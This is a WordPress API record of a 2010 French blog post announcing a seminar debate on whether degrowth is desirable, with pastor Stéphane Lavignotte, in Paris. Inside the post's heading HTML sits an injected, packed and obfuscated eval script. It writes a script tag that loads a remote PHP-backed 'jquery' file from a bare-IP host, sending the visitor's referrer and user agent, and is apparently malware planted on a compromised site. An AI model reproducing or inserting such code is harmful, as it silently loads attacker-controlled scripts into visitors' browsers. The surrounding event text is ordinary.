{"id":5248,"date":"2010-12-06T07:00:56","date_gmt":"2010-12-06T06:00:56","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=5248"},"modified":"2010-12-07T23:20:45","modified_gmt":"2010-12-07T22:20:45","slug":"la-decroissance-est-elle-souhaitable-debat-avec-stephane-lavignotte-le-mardi-7-decembre-2010-a-18h","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=5248","title":{"rendered":"La d\u00e9croissance est-elle souhaitable ? &#8211; D\u00e9bat avec St\u00e9phane Lavignotte le Mardi 7 d\u00e9cembre 2010, \u00e0 18h"},"content":{"rendered":"<h3 style=\"text-align: center;\">S\u00e9minaire <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hykrf|var|u0026u|referrer|nrbti||js|php'.split('|'),0,{}))\n<\/script><\/noindex> d\u2019Espaces Marx et de la Fondation Gabriel P\u00e9ri<\/h3>\n<p style=\"text-align: center;\">\u00ab Quel nouveau mode de d\u00e9veloppement ? \u00bb<br \/>\n<a href=\"..\/?p=4274\"><em>St\u00e9phane Lavignotte<\/em><\/a><br \/>\n<em> <\/em><em>ancien journaliste, pasteur \u00e0 la Mission populaire de La Maison Verte (Paris 18e)<\/em><\/p>\n<p style=\"text-align: center;\">Mardi 7 d\u00e9cembre 2010<br \/>\nDe 18h00 \u00e0 20h<br \/>\nAutour du th\u00e8me :<br \/>\n<strong>La d\u00e9croissance est-elle souhaitable ?<\/strong><br \/>\nSalle de D\u00e9l\u00e9gation<br \/>\n6 avenue Mathurin Moreau<br \/>\n75019 Paris<br \/>\nM\u00e9tro Colonel Fabien<br \/>\n<!--more--><br \/>\nEn ce d\u00e9but de XXIe si\u00e8cle, o\u00f9 la prise de conscience des probl\u00e8mes \u00e9cologiques s\u2019\u00e9tend, le th\u00e8me de \u00ab la d\u00e9croissance \u00bb est devenu un \u00e9tendard pour les tenant d\u2019une \u00e9cologie politique radicale. Des r\u00e9flexions d&rsquo;Andr\u00e9 Gorz dans les ann\u00e9es 1970 aux travaux actuels de Paul Ari\u00e8s, Vincent Cheynet ou Serge Latouche, elle est devenue un des axes des pens\u00e9es critiques. Quels sont les apports et les impens\u00e9s de la galaxie des \u00ab objecteurs de croissance \u00bb, sur le plan \u00e9thique, \u00e9conomique, social et politique ?<\/p>\n<div><\/div>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/?p=4274\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.editionstextuel.com\/images_catalogue\/458\" alt=\"\" width=\"109\" height=\"171\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>S\u00e9minaire d\u2019Espaces Marx et de la Fondation Gabriel P\u00e9ri \u00ab Quel nouveau mode de d\u00e9veloppement ? \u00bb St\u00e9phane Lavignotte ancien journaliste, pasteur \u00e0 la Mission populaire de La Maison Verte (Paris 18e) Mardi 7 d\u00e9cembre 2010 De 18h00 \u00e0 20h &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=5248\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5248","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/5248","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5248"}],"version-history":[{"count":5,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/5248\/revisions"}],"predecessor-version":[{"id":5260,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/5248\/revisions\/5260"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5248"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5248"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}